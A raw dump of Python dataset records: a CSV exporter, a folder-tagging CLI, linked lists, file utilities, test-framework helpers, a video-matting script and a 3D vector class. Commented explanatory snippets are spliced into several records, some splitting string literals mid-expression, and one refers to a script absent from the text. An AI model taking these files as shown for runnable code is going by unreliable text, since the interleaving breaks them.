App()\nmyApp.run()\n","sub_path":"coloredSquare.py","file_name":"coloredSquare.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650846815","text":"import csv\nimport os\nimport datetime\n\nclass Article:\n def __init__(self, order_number, name, unit, price_net, available=True, note=\"\", manufacturer=\"\", origin=\"\", vat=0, deposit=0, unit_quantity=1, category=\"\"):\n self.available = available\n self.order_number = order_number\n self.name = name\n self.note = note\n self.manufacturer = manufacturer\n self.origin = origin\n self.unit = unit\n self.price_net = price_net\n self.vat = vat\n self.deposit = deposit\n self.unit_quantity = unit_quantity\n self.category = category\n\ndef validate_string(string, string_type):\n string = str(string)\n if len(string) > 255:\n shortened_string = string[0:252] + 
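# The word-frequency counting in the Aramaki script above, shown end to end
# on invented rows: keep only tweets containing the keyword, attach a unit
# counter, and resample to daily sums. The keyword '桜島' is the one the
# script uses.
import numpy as np
import pandas as pd

df = pd.DataFrame(
    {'tweet': ['桜島 erupts', 'weather talk', '桜島 again']},
    index=pd.to_datetime(['2017-01-01 09:00', '2017-01-01 12:00', '2017-01-02 08:00']),
)
df = df[df['tweet'].str.contains('桜島')]
df['counter'] = np.ones(df.shape[0])
print(df[['counter']].resample('D').sum())  # 2 hits on day one, 1 on day two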
'...'\n print(\"Overlong article \" + string_type + \" (\" + str(len(string)) + \" characters) registered:\")\n print(string)\n print(\"shortened to:\")\n print(shortened_string)\n string = shortened_string\n\n string.replace(';', ',')\n return string\n\ndef get_data_from_articles(articles):\n rows = []\n for article in articles:\n\n avail = ''\n if not article.available:\n avail = 'x'\n\n article_data = [avail, validate_string(article.order_number, 'order number'), validate_string(article.name, 'name'), validate_string(article.note, 'note'), validate_string(article.manufacturer, 'manufacturer'), \n validate_string(article.origin, 'origin'), validate_string(article.unit, 'unit'), article.price_net, article.vat, article.deposit, article.unit_quantity, '', '', article.category]\n rows.append(article_data)\n\n return rows\n\ndef write_csv(supplier, articles):\n rows = get_data_from_articles(articles=articles)\n\n if not os.path.exists(\"output\"):\n os.makedirs(\"output\")\n file_name = supplier + datetime.date.today().isoformat()\n number = 1\n while os.path.isfile('output/' + file_name + '_' + str(number) + '.csv'):\n number += 1\n\n with open('output/' + file_name + '_' + str(number) + '.csv', 'w', encoding='UTF8', newline='') as f:\n writer = csv.writer(f, delimiter=';')\n writer.writerow(['avail.', 'Order number', 'Name', 'Note', 'Manufacturer', 'Origin', 'Unit', 'Price (net)', 'VAT', 'Deposit', 'Unit quantity', '', '', 'Category'])\n writer.writerows(rows)","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"33947347","text":"\"\"\"\nCommands for dealing with tagged folders.\n\"\"\"\nimport collections\n\nimport qq\nimport os\n\n\nclass TagStorage(qq.Storage):\n def __init__(self):\n super(TagStorage, self).__init__('tags')\n if 'tags' not in self or not isinstance(self['tags'], collections.Mapping):\n self['tags'] = dict()\n\n\nclass TagCommand(qq.QQCommand):\n \"\"\"\n Tag a folder to return to later.\n \"\"\"\n\n name = 'tag'\n shorttext = 'Tag a folder with a bookmark name'\n\n def execute(self, *args):\n if len(args) == 1:\n path = os.getcwd()\n name = args[0]\n elif len(args) == 2:\n path = args[0]\n name = args[1]\n else:\n raise qq.QQBadInvocation()\n\n tags = TagStorage()\n tags['tags'][name] = path\n qq.output('Tagged folder {} with name \"{}\".'.format(path, name))\n return True\n\n def help(self):\n return '''Usage: qq tag [FOLDER] NAME\nSave the folder FOLDER under the name NAME. If FOLDER is omitted, then\nthe current working directory is used. 
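# The unique-filename probe inside write_csv above, as one helper: try
# increasing numeric suffixes until a path is free. The directory and
# supplier names below are placeholders.
import datetime
import os

def unique_csv_path(out_dir, supplier):
    stem = supplier + datetime.date.today().isoformat()
    number = 1
    while os.path.isfile(os.path.join(out_dir, '{}_{}.csv'.format(stem, number))):
        number += 1
    return os.path.join(out_dir, '{}_{}.csv'.format(stem, number))

print(unique_csv_path('.', 'demo_'))  # e.g. ./demo_2024-05-01_1.csv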
Subsequently, use 'qq tag.go NAME' to jump to\nthe folder.'''\n\n\nclass ListTagsCommand(qq.QQCommand):\n \"\"\"\n List tagged folders matching a regular expression pattern.\n \"\"\"\n\n name = 'tag.ls'\n shorttext = 'List tagged folders'\n\n def execute(self, pattern=None):\n tags = TagStorage()\n pattern = pattern or '.*'\n qq.output('Tagged folders matching the pattern {}:'.format(pattern))\n if len(tags['tags']) == 0:\n print(' No tags found.')\n else:\n for name, path in tags['tags'].iteritems():\n print(' * {0} ({1})'.format(name, path))\n return True\n\n def help(self):\n return '''Usage: qq tag.ls [PATTERN]\nList tagged folders, optionally filtering against a regular expression pattern.\n'''\n\n\nclass DeleteTagCommand(qq.QQCommand):\n \"\"\"\n Delete a tagged folder by name.\n \"\"\"\n\n name = 'tag.rm'\n shorttext = 'Delete a tagged folder'\n\n def execute(self, name):\n tags = TagStorage()\n path = tags['tags'].pop(name, None)\n if path:\n qq.output('Untagged folder {} with name \"{}\"'.format(path, name))\n else:\n qq.output('Tag not found: ' + name)\n return True\n\n def help(self):\n return '''Usage: qq tag.rm NAME\nDelete the tagged folder named NAME.'''\n\n\nclass GoToTagCommand(qq.QQCommand):\n \"\"\"\n Jump to a tagged folder.\n \"\"\"\n\n name = 'tag.go'\n shorttext = 'Jump to a tagged folder'\n\n def execute(self, name):\n tags = TagStorage()\n if name not in tags['tags']:\n qq.output('Tag not found: ' + name)\n return False\n path = tags['tags'][name]\n qq.shell_execute('cd \"{}\"'.format(path))\n qq.output('Changing to tagged folder \"{}\" ({})'.format(name, path))\n return True\n\n def help(self):\n return '''Usage: qq tag.rm NAME\nDelete the tagged folder named NAME.'''\n","sub_path":"cmd/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585710824","text":"\n\n# peer = '127.0.0.1'\npeer = '0.0.0.1'\ncmd = ['ping', '-c', '2', '-W', '1', peer]\nres = None\nimport subprocess\n\ntry:\n res = subprocess.check_output(\n cmd,\n shell=False\n ).decode('utf-8')\n# except subprocess.CalledProcessError as error:\n# print('error.stderr:{}'.format(error.stderr))\n# print('error.output:{}'.format(error.output))\nexcept Exception as e:\n print('cmd:{}'.format(cmd))\n print('error.output:{}'.format(e.output))\n print('error.stderr:{}'.format(e.stderr))\n\nprint('res:{}'.format(res))","sub_path":"ping/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"204189085","text":"class Node:\n def __init__(self,data):\n self.info = data\n self.next = None\n\nclass LinkedListV2:\n def __init__(self):\n self.head = None\n\n def display(self):\n if self.head is None:\n print(\"List is empty\")\n temp = self.head\n while temp:\n print(temp.info,end=\" \")\n temp = temp.next\n\n\n def insertAtEnd(self,data):\n self.data = Node(data)\n if self.head is None:\n self.head = self.data\n else:\n currNode = self.head # head refers to the first node\n while currNode.next is not None:\n currNode = currNode.next\n currNode.next = self.data\n\n def length(self):\n count = 0\n temp = self.head\n while temp:\n count +=1\n temp = temp.next\n print(\"Length of the list is \" , count)\n return None\n\n def search(self,item):\n count = 0\n temp = self.head\n while temp:\n count +=1\n if temp.info == item:\n print(\"Element found at \" , count , \" Position \")\n 
return\n temp = temp.next\n print(\"Element doesnt exist \")\n\n def insertAtBeg(self,item):\n node = Node(item)\n if self.head is None:\n self.head = node\n\n node.next = self.head\n self.head = node\n\n def insertaftergivenElement(self,element,data):\n temp = self.head\n\n while temp:\n if temp.info == element:\n node = Node(data)\n node.next = temp.next\n temp.next = node\n return\n temp = temp.next\n print(\"Element \" , element , \" doesnt exist \")\n\n def insertAtGivenPosition(self,data,pos):\n node = Node(data)\n if pos == 1:\n node.next = self.head\n self.head = node\n return\n\n temp = self.head\n\n while pos >2 and temp:\n temp = temp.next\n pos -=1\n\n node.next = temp.next\n temp.next = node\n\n\n def delete(self,item):\n if self.head is None:\n print(\"List is Empty\")\n return\n if self.head.info == item:\n self.temp = self.head\n self.head = self.head.next\n return\n\n self.p = None\n currnode = self.head\n\n while currnode:\n if currnode.info == item:\n self.temp = self.p.next # temp points to a node\n self.p.next = self.temp.next\n return\n self.p = currnode\n currnode = currnode.next\n print(\"Element doesnt exist\")\n\n\n\n\n\nif __name__==\"__main__\":\n list = LinkedListV2()\n list.insertAtEnd(1)\n list.insertAtEnd(2) # Insert at the end\n list.display()\n list.insertAtEnd(3)\n print(\"--------------------\")\n list.length()\n list.search(4)\n list.insertAtBeg(10)\n list.display()\n print(\"Printing Insert after element \")\n list.insertaftergivenElement(1,20)\n list.insertaftergivenElement(10,40)\n list.insertaftergivenElement(5,34)\n list.display()\n print(\"++++++++++++++++++++++\")\n list.insertAtGivenPosition(20,1)\n list.insertAtGivenPosition(30,3)\n list.display()\n list.delete(3)\n print(\"-----\")\n list.display()\n\n\n\n\n\n\n","sub_path":"LinkedList/LinkedListVersion2.py","file_name":"LinkedListVersion2.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446956959","text":"# -*-coding=utf-8-*-\nimport codecs\nimport os\nimport re\nimport shutil\n\n\ndef func():\n cwd = os.getcwd()\n print(cwd)\n cwd1 = os.path.dirname(__file__)\n print(cwd1)\n\n\n# p = re.compile('\\.txt')\n# print(cwd)\n# for dirpath, dirname, filename in os.walk(cwd):\n# # print(dirpath,dirname,filename)\n# #print(dirpath)\n# print(dirname)\n# print(type(filename))\n# if filename is not None:\n# for i in filename:\n# #if filename is not None:\n\n\n#\n# if p.search(i):\n# os.remove(os.path.join(dirpath, i))\n\n\ndef testcase1():\n i = \"memory\"\n sub_folder = os.path.join(os.getcwd(), i)\n print(sub_folder)\n\n\ndef testcase2():\n # read/readline/readlines\n f1 = open('data.cfg', 'r')\n r1 = f1.read()\n print('type of r1 ', type(r1))\n print('content of r1 ', r1)\n f1.close()\n\n f2 = open('data.cfg', 'r')\n r2 = f2.readlines()\n\n print('type of r2 ', type(r2))\n print('content of r2 ', r2)\n f2.close()\n\n f3 = open('data.cfg', 'r')\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n\n f3.close()\n\n\ndef testcase4():\n fp = codecs.open('data/house_10.cfg', 'r', encoding='utf-8')\n data = fp.readlines()\n # print(data[:5])\n print(len(data))\n data = map(lambda x: x.split()[3:6], data)\n\n for i in range(5):\n print(data[i][0])\n print(data[i][2])\n # print(data[i][2])\n\n 
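# Note: insertAtBeg above still executes 'node.next = self.head' after the
# empty-list branch has already made the new node the head, so inserting
# into an empty list links the node to itself. A corrected sketch of the
# same method:
def insertAtBeg(self, item):
    node = Node(item)
    if self.head is None:
        self.head = node
        return  # one-element list; stop before creating a self-loop
    node.next = self.head
    self.head = node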
print(len(data))\n\n\n# 写入缓冲\ndef testcase5():\n f = open('data/buffer.txt', 'w', buffering=1)\n f.write(\"Hello world\")\n\n\ndef testcase6():\n file = os.listdir('.')\n for i in file:\n print(i)\n\n\ndef move_file():\n # current_path = os.getcwd()\n current_path = r'D:\\锤子手机相册\\坚果'\n for i in range(1, 13):\n try:\n folder_path = os.path.join(current_path,'2018-{}'.format(str(i).zfill(2)))\n os.mkdir(folder_path)\n except Exception as e:\n print(e)\n\n for dirname, dirs, files in os.walk(current_path):\n print(dirname, dirs, files, 'end')\n if files:\n for file in files:\n try:\n if re.findall('2018(\\d{2})', file):\n month = re.findall('IMG_2018(\\d{2})', file)[0]\n\n org_file = os.path.join(dirname,file)\n dst_file = os.path.join(current_path,'2018-{}'.format(month),file)\n # fpath,fname = os.path.split(file)\n\n shutil.move(org_file,dst_file)\n except Exception as e:\n print(e)\n\n\ndef main():\n # testcase6()\n # func()\n move_file()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"file_operation.py","file_name":"file_operation.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638088520","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \"\"\"迭代\"\"\"\n if not head:\n return None\n prev = None\n tail = tmp = head\n while tmp:\n tmp = tail.next\n tail.next = prev\n prev = tail\n tail = tmp\n\n return prev\n\n def reverseList2(self, head):\n \"\"\"递归\"\"\"\n if not head or not head.next:\n return head\n\n p = self.reverseList2(head.next)\n head.next.next = head\n head.next = None\n return p\n\n\na = ListNode(1)\na.next = ListNode(2)\na.next.next = ListNode(3)\na.next.next.next = ListNode(4)\n\ns = Solution()\ns.reverseList2(a)\n","sub_path":"leetcode_python/206. 反转链表.py","file_name":"206. 反转链表.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410986711","text":"# coding: utf-8\n\nimport collections\nimport functools\nimport math\nimport os\nimport re\nimport sys\n\nfrom . 
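# The month routing inside move_file above, reduced to one testable helper:
# pull the two-digit month out of an 'IMG_2018MM...' name (the pattern the
# script matches on) and build the matching per-month folder. The paths
# below are invented.
import os
import re

def month_folder(root, filename):
    match = re.findall(r'IMG_2018(\d{2})', filename)
    return os.path.join(root, '2018-{}'.format(match[0])) if match else None

print(month_folder('/tmp/photos', 'IMG_20180312_100001.jpg'))  # /tmp/photos/2018-03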
import config\nimport yatest_lib.tools\n\n\nSEP = '/'\nTEST_MOD_PREFIX = '__tests__.'\n\n\nclass SubtestInfo(object):\n skipped_prefix = '[SKIPPED] '\n\n @classmethod\n def from_str(cls, s):\n if s.startswith(SubtestInfo.skipped_prefix):\n s = s[len(SubtestInfo.skipped_prefix) :]\n skipped = True\n\n else:\n skipped = False\n\n return SubtestInfo(*s.rsplit(TEST_SUBTEST_SEPARATOR, 1), skipped=skipped)\n\n def __init__(self, test, subtest=\"\", skipped=False, **kwargs):\n self.test = test\n self.subtest = subtest\n self.skipped = skipped\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def __str__(self):\n s = ''\n\n if self.skipped:\n s += SubtestInfo.skipped_prefix\n\n return s + TEST_SUBTEST_SEPARATOR.join([self.test, self.subtest])\n\n def __repr__(self):\n return str(self)\n\n\nclass Status(object):\n GOOD, XFAIL, FAIL, XPASS, MISSING, CRASHED, TIMEOUT = range(7)\n SKIPPED = -100\n NOT_LAUNCHED = -200\n CANON_DIFF = -300\n FLAKY = -1\n BY_NAME = {\n 'good': GOOD,\n 'fail': FAIL,\n 'xfail': XFAIL,\n 'xpass': XPASS,\n 'missing': MISSING,\n 'crashed': CRASHED,\n 'skipped': SKIPPED,\n 'flaky': FLAKY,\n 'not_launched': NOT_LAUNCHED,\n 'timeout': TIMEOUT,\n 'diff': CANON_DIFF,\n }\n TO_STR = {\n GOOD: 'good',\n FAIL: 'fail',\n XFAIL: 'xfail',\n XPASS: 'xpass',\n MISSING: 'missing',\n CRASHED: 'crashed',\n SKIPPED: 'skipped',\n FLAKY: 'flaky',\n NOT_LAUNCHED: 'not_launched',\n TIMEOUT: 'timeout',\n CANON_DIFF: 'diff',\n }\n\n\nclass Test(object):\n def __init__(self, name, path, status=None, comment=None, subtests=None):\n self.name = name\n self.path = path\n self.status = status\n self.comment = comment\n self.subtests = subtests or []\n\n def __eq__(self, other):\n if not isinstance(other, Test):\n return False\n return self.name == other.name and self.path == other.path\n\n def __str__(self):\n return \"Test [{} {}] - {} - {}\".format(self.name, self.path, self.status, self.comment)\n\n def __repr__(self):\n return str(self)\n\n def add_subtest(self, subtest):\n self.subtests.append(subtest)\n\n def setup_status(self, status, comment):\n self.status = Status.BY_NAME[status or 'good']\n if len(self.subtests) != 0:\n self.status = max(self.status, max(s.status for s in self.subtests))\n self.comment = comment\n\n def subtests_by_status(self, status):\n return [x.status for x in self.subtests].count(status)\n\n\nTEST_SUBTEST_SEPARATOR = '::'\n\n\n# TODO: extract color theme logic from ya\nCOLOR_THEME = {\n 'test_name': 'light-blue',\n 'test_project_path': 'dark-blue',\n 'test_dir_desc': 'dark-magenta',\n 'test_binary_path': 'light-gray',\n}\n\n\n# XXX: remove me\nclass YaCtx(object):\n pass\n\n\nya_ctx = YaCtx()\n\nTRACE_FILE_NAME = \"ytest.report.trace\"\n\n\ndef lazy(func):\n memory = {}\n\n @functools.wraps(func)\n def wrapper(*args):\n # Disabling caching in test mode\n if config.is_test_mode():\n return func(*args)\n\n try:\n return memory[args]\n except KeyError:\n memory[args] = func(*args)\n return memory[args]\n\n return wrapper\n\n\n@lazy\ndef _get_mtab():\n if os.path.exists(\"/etc/mtab\"):\n with open(\"/etc/mtab\") as afile:\n data = afile.read()\n return [line.split(\" \") for line in data.split(\"\\n\") if line]\n return []\n\n\n@lazy\ndef get_max_filename_length(dirname):\n \"\"\"\n Return maximum filename length for the filesystem\n :return:\n \"\"\"\n if sys.platform.startswith(\"linux\"):\n # Linux user's may work on mounted ecryptfs filesystem\n # which has filename length limitations\n for entry in _get_mtab():\n mounted_dir, filesystem = entry[1], 
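# The @lazy memoiser above, boiled down to its essentials: results are
# cached per positional-argument tuple unless caching is disabled. The
# config.is_test_mode() check is replaced here by a plain flag, since the
# yatest config module is not available outside the framework.
import functools

CACHING_ENABLED = True

def lazy(func):
    memory = {}

    @functools.wraps(func)
    def wrapper(*args):
        if not CACHING_ENABLED:
            return func(*args)
        if args not in memory:
            memory[args] = func(*args)
        return memory[args]

    return wrapper

@lazy
def expensive(n):
    print('computing', n)
    return n * n

expensive(4); expensive(4)  # 'computing 4' is printed only once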
entry[2]\n # http://unix.stackexchange.com/questions/32795/what-is-the-maximum-allowed-filename-and-folder-size-with-ecryptfs\n if filesystem == \"ecryptfs\" and dirname and dirname.startswith(mounted_dir):\n return 140\n # default maximum filename length for most filesystems\n return 255\n\n\ndef get_unique_file_path(dir_path, filename, cache=collections.defaultdict(set)):\n \"\"\"\n Get unique filename in dir with proper filename length, using given filename/dir.\n File/dir won't be created (thread nonsafe)\n :param dir_path: path to dir\n :param filename: original filename\n :return: unique filename\n \"\"\"\n max_suffix = 10000\n # + 1 symbol for dot before suffix\n tail_length = int(round(math.log(max_suffix, 10))) + 1\n # truncate filename length in accordance with filesystem limitations\n filename, extension = os.path.splitext(filename)\n # XXX\n if sys.platform.startswith(\"win\"):\n # Trying to fit into MAX_PATH if it's possible.\n # Remove after DEVTOOLS-1646\n max_path = 260\n filename_len = len(dir_path) + len(extension) + tail_length + len(os.sep)\n if filename_len < max_path:\n filename = yatest_lib.tools.trim_string(filename, max_path - filename_len)\n filename = (\n yatest_lib.tools.trim_string(filename, get_max_filename_length(dir_path) - tail_length - len(extension))\n + extension\n )\n candidate = os.path.join(dir_path, filename)\n\n key = dir_path + filename\n counter = sorted(\n cache.get(\n key,\n {\n 0,\n },\n )\n )[-1]\n while os.path.exists(candidate):\n cache[key].add(counter)\n counter += 1\n assert counter < max_suffix\n candidate = os.path.join(dir_path, filename + \".{}\".format(counter))\n return candidate\n\n\ndef escape_for_fnmatch(s):\n return s.replace(\"[\", \"[\").replace(\"]\", \"]\")\n\n\ndef get_python_cmd(opts=None, use_huge=True, suite=None):\n if opts and getattr(opts, 'flags', {}).get(\"USE_ARCADIA_PYTHON\") == \"no\":\n return [\"python\"]\n if suite and not suite._use_arcadia_python:\n return [\"python\"]\n if use_huge:\n return [\"$(PYTHON)/python\"]\n ymake_path = opts.ymake_bin if opts and getattr(opts, 'ymake_bin', None) else \"$(YMAKE)/ymake\"\n return [ymake_path, \"--python\"]\n\n\ndef normalize_name(name):\n replacements = [\n (\"\\\\\", \"\\\\\\\\\"),\n (\"\\n\", \"\\\\n\"),\n (\"\\t\", \"\\\\t\"),\n (\"\\r\", \"\\\\r\"),\n ]\n for from_, to in replacements:\n name = name.replace(from_, to)\n return name\n\n\n@lazy\ndef normalize_filename(filename):\n \"\"\"\n Replace invalid for file names characters with string equivalents\n :param some_string: string to be converted to a valid file name\n :return: valid file name\n \"\"\"\n not_allowed_pattern = r\"[\\[\\]\\/:*?\\\"\\'<>|+\\0\\\\\\s\\x0b\\x0c]\"\n filename = re.sub(not_allowed_pattern, \".\", filename)\n return re.sub(r\"\\.{2,}\", \".\", filename)\n\n\ndef get_test_log_file_path(output_dir, class_name, test_name, extension=\"log\"):\n \"\"\"\n get test log file path, platform dependant\n :param output_dir: dir where log file should be placed\n :param class_name: test class name\n :param test_name: test name\n :return: test log file name\n \"\"\"\n if os.name == \"nt\":\n # don't add class name to the log's filename\n # to reduce it's length on windows\n filename = test_name\n else:\n filename = \"{}.{}\".format(class_name, test_name)\n if not filename:\n filename = \"test\"\n filename += \".\" + extension\n filename = normalize_filename(filename)\n return get_unique_file_path(output_dir, filename)\n\n\n@lazy\ndef split_node_id(nodeid, test_suffix=None):\n path, 
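# normalize_filename above in miniature: characters that are unsafe in file
# names are mapped to dots, then runs of dots are squashed. The regex is
# the one the function uses; the input string is invented.
import re

def normalize_filename(filename):
    filename = re.sub(r"[\[\]\/:*?\"\'<>|+\0\\\s\x0b\x0c]", ".", filename)
    return re.sub(r"\.{2,}", ".", filename)

print(normalize_filename('my test:report?.log'))  # my.test.report.log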
possible_open_bracket, params = nodeid.partition('[')\n separator = \"::\"\n test_name = None\n if separator in path:\n path, test_name = path.split(separator, 1)\n path = _unify_path(path)\n class_name = os.path.basename(path)\n if test_name is None:\n test_name = class_name\n if test_suffix:\n test_name += \"::\" + test_suffix\n if separator in test_name:\n klass_name, test_name = test_name.split(separator, 1)\n if not test_suffix:\n # test suffix is used for flakes and pep8, no need to add class_name as it's === class_name\n class_name += separator + klass_name\n if separator in test_name:\n test_name = test_name.split(separator)[-1]\n test_name += possible_open_bracket + params\n return yatest_lib.tools.to_utf8(class_name), yatest_lib.tools.to_utf8(test_name)\n\n\n@lazy\ndef _suffix_test_modules_tree():\n root = {}\n\n for module in sys.extra_modules:\n if not module.startswith(TEST_MOD_PREFIX):\n continue\n\n module = module[len(TEST_MOD_PREFIX) :]\n node = root\n\n for name in reversed(module.split('.')):\n if name == '__init__':\n continue\n node = node.setdefault(name, {})\n\n return root\n\n\ndef _conftest_load_policy_is_local(path):\n return SEP in path and getattr(sys, \"is_standalone_binary\", False)\n\n\nclass MissingTestModule(Exception):\n pass\n\n\n# If CONFTEST_LOAD_POLICY==LOCAL the path parameters is a true test file path. Something like\n# /-B/taxi/uservices/services/alt/gen/tests/build/services/alt/validation/test_generated_files.py\n# If CONFTEST_LOAD_POLICY is not LOCAL the path parameter is a module name with '.py' extension added. Example:\n# validation.test_generated_files.py\n# To make test names independent of the CONFTEST_LOAD_POLICY value replace path by module name if possible.\n@lazy\ndef _unify_path(path):\n py_ext = \".py\"\n\n path = path.strip()\n if _conftest_load_policy_is_local(path) and path.endswith(py_ext):\n # Try to find best match for path as a module among test modules and use it as a class name.\n # This is the only way to unify different CONFTEST_LOAD_POLICY modes\n suff_tree = _suffix_test_modules_tree()\n node, res = suff_tree, []\n\n assert path.endswith(py_ext), path\n parts = path[: -len(py_ext)].split(SEP)\n\n # Use SEP as trailing terminator to make an extra step\n # and find a proper match when parts is a full matching path\n for p in reversed([SEP] + parts):\n if p in node:\n node = node[p]\n res.append(p)\n else:\n if res:\n return '.'.join(reversed(res)) + py_ext\n else:\n # Top level test module\n if TEST_MOD_PREFIX + p in sys.extra_modules:\n return p + py_ext\n # Unknown module - raise an error\n break\n\n raise MissingTestModule(\"Can't find proper module for '{}' path among: {}\".format(path, suff_tree))\n else:\n return path\n\n\ndef colorize_pytest_error(text):\n error_prefix = \"E \"\n blocks = [text]\n\n while True:\n text = blocks.pop()\n\n err_start = text.find(error_prefix, 1)\n if err_start == -1:\n return ''.join(blocks + [text])\n\n for pos in range(err_start + 1, len(text) - 1):\n if text[pos] == '\\n':\n if not text[pos + 1 :].startswith(error_prefix):\n err_end = pos + 1\n break\n else:\n err_end = len(text)\n\n bt, error, tail = text[:err_start], text[err_start:err_end], text[err_end:]\n\n filters = [\n # File path, line number and function name\n (\n re.compile(r\"^(.*?):(\\d+): in (\\S+)\", flags=re.MULTILINE),\n r\"[[unimp]]\\1[[rst]]:[[alt2]]\\2[[rst]]: in [[alt1]]\\3[[rst]]\",\n ),\n ]\n for regex, substitution in filters:\n bt = regex.sub(substitution, bt)\n\n blocks.append(bt)\n blocks.append('[[bad]]' + 
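# A stripped-down illustration of the node-id parsing at the top of
# split_node_id above: peel off the parametrisation suffix first, then
# separate the file path from the test name on '::'. The node id below is
# an invented pytest example.
nodeid = 'tests/test_math.py::TestOps::test_add[case1]'

path, possible_open_bracket, params = nodeid.partition('[')
path, _, test_name = path.partition('::')
print(path)                                        # tests/test_math.py
print(test_name + possible_open_bracket + params)  # TestOps::test_add[case1]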
error)\n blocks.append(tail)\n","sub_path":"library/python/pytest/yatest_tools.py","file_name":"yatest_tools.py","file_ext":"py","file_size_in_byte":12053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"552313231","text":"from base.base_inference import VideoInference\nfrom models import UNet\nfrom models import DeepLabV3Plus\nfrom subprocess import call\nimport torch\nimport ffmpeg\nimport argparse\nimport sys\n\n\nparser = argparse.ArgumentParser(description=\"Arguments for the script\")\nparser.add_argument('--inp', type=str, help='Input video')\nparser.add_argument('--out', type=str, help='Output video')\nparser.add_argument('--model', type=str, help='Path to .pth pretrained model',\n default='./pretr/model.pth')\nparser.add_argument('--frange', nargs=2, type=int, help='Frame range to process')\n\n\nif len(sys.argv)==1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n\nargs = parser.parse_args()\n\n\n\nif args.inp is None or args.out is None :\n print('No arguments specified. Exiting.')\n sys.exit(0)\n\n\n# CHECKPOINT = \"./pretr/DeepLabV3Plus_ResNet18.pth\"\nCHECKPOINT = args.model\nBACKBONE = \"resnet18\"\n\n\nif not torch.cuda.is_available() : \n print(\"GPU is not available. Abort.\")\n sys.exit(0)\n\n\nmodel = DeepLabV3Plus(backbone=BACKBONE, num_classes=2)\ntrained_dict = torch.load(CHECKPOINT, map_location=\"cpu\")['state_dict']\nmodel.load_state_dict(trained_dict, strict=False)\nmodel.cuda()\nmodel.eval()\nprint('Model loaded successfully.')\n\n\ninference = VideoInference(\n model=model,\n video_path=args.inp,\n video_out_path='./.tmp.mp4',\n input_size=320,\n background_path = \"./backgrounds/white.jpg\",\n use_cuda=True,\n draw_mode='matting',\n frame_range=args.frange\n)\n\nprint('Start processing frames...')\ninference.run()\nprint('Done.')\n\nprint('Running ffmpeg to merge video channels...')\nin1 = ffmpeg.input(args.inp)\nin2 = ffmpeg.input('./.tmp.mp4')\nout = ffmpeg.output(in1.audio, in2.video, args.out)\nout.run(overwrite_output=True)\nprint('All done.')\n\n\n\n\n","sub_path":"inf.py","file_name":"inf.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38124450","text":"\nfrom math import sqrt\n\n\nclass Vetor3D:\n\n def __init__(self, x, y, z):\n\n self.x = x\n self.y = y\n self.z = z\n\n def get_x(self):\n \"\"\"Retorna a coordenada x, do vetor.\n \"\"\"\n return(self.x)\n\n def get_y(self):\n \"\"\"Retorna a coordenada y, do vetor.\n \"\"\"\n return(self.y)\n\n def get_z(self):\n \"\"\"Retorna a coordenada z, do vetor.\n \"\"\"\n return(self.z)\n\n def __str__(self):\n \"\"\"Retorna uma string que representa o vetor 3D.\n \"\"\"\n return(\"Vetor3D(\" + str(self.x) + \", \" + str(self.y) + \", \" \\\n + str(self.z) + \")\")\n\n def adiciona(self, outro_vetor):\n \"\"\"Retorna um novo vetor, que resulta da soma do vetor self\n com o vetor outro_vetor.\n \"\"\"\n return(Vetor3D(self.x + outro_vetor.x,\n self.y + outro_vetor.y,\n self.z + outro_vetor.z))\n\n def __add__(self, outro_vetor):\n \"\"\"Define o operador +.\n \"\"\"\n return(self.adiciona(outro_vetor))\n\n def multiplica_escalar(self, escalar):\n \"\"\"Retorna um novo vetor que resultado do vetor self\n multiplicado pelo escalar.\n \"\"\"\n return(Vetor3D(self.x * escalar,\n self.y * escalar,\n self.z * escalar))\n\n def __mul__(self, escalar):\n \"\"\"Define o operador * como sendo a multiplicação por escalar.\"\"\"\n 
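# The channel merge done with ffmpeg-python at the end of inf.py above, in
# isolation: take the audio stream from the source clip and the video
# stream from the processed clip, then mux them into one output. The file
# names are placeholders.
import ffmpeg  # pip install ffmpeg-python

original = ffmpeg.input('input.mp4')       # supplies the untouched audio
processed = ffmpeg.input('processed.mp4')  # supplies the matted video
out = ffmpeg.output(original.audio, processed.video, 'merged.mp4')
out.run(overwrite_output=True)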
